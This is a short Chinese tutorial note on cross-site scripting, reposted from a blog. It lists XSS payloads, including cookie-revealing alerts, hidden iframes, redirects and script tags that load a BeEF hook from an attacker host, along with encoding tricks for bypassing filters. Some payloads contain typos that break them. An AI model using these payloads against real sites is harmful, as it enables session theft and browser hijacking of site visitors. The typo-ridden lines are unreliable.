首页 > 其他 > 详细

跨站脚本攻击xss

时间:2019-07-17 22:41:04      阅读:99      评论:0      收藏:0      [点我收藏+]

1、 构造xss脚本

常用HTML标签

<iframe> 创建一个包含另一个文件的内联框架
<textarea>
<img>
<script>可以通过src指向其他网页
type元素必须的
常用做图像操作,表单验证,动态内容更新

常用js函数

alert 
window.locateion 获得当前页面的url
location.href 显示当前页面的完整url
onload 完成夹在
onsubmit 确认按钮被惦记
onerror 加载文档时或者图像时发生错误

构造xss脚本

弹窗警告
<script>alert(‘xss‘)</script>
<script>alert(document.cookie)</script>
?
页面嵌套
<iframe src=http://www.baidu.com width=0 hight=0></iframe>
?
页面重定向
<script>window.location="http://www.baidu.com"</script>
<script>location.href="http://www.baidu.com"</script>
?
弹窗警告并重定向
<script>alert(‘请移步到我们的新网站‘);location.href="http://www.baidu.com"</script>
?
访问恶意代码
<script src="http://www.baidu.com/xss.js"></script>
<script src="http://BeEF_ip:3000/hook.js"></script>
?
巧用图片标签
<img src="#" onerror-alert(‘xss‘)>
<img src="javascript:alert(‘xss‘);">
<img src="http://BeEf_ip:3000/hook.js">
?
绕开过滤脚本
大小写
字符编码,采用url,base64等编码

技术分享图片

2、分类

反射性xss
存储型xss

3、自动化xss:BeEF

技术分享图片

跨站脚本攻击xss

原文:https://www.cnblogs.com/zyh0430/p/11203964.html

(0)
(0)
   
举报
评论 一句话评论(0
关于我们 - 联系我们 - 留言反馈 - 联系我们:wmxa8@hotmail.com
© 2014 bubuko.com 版权所有
打开技术之扣,分享程序人生!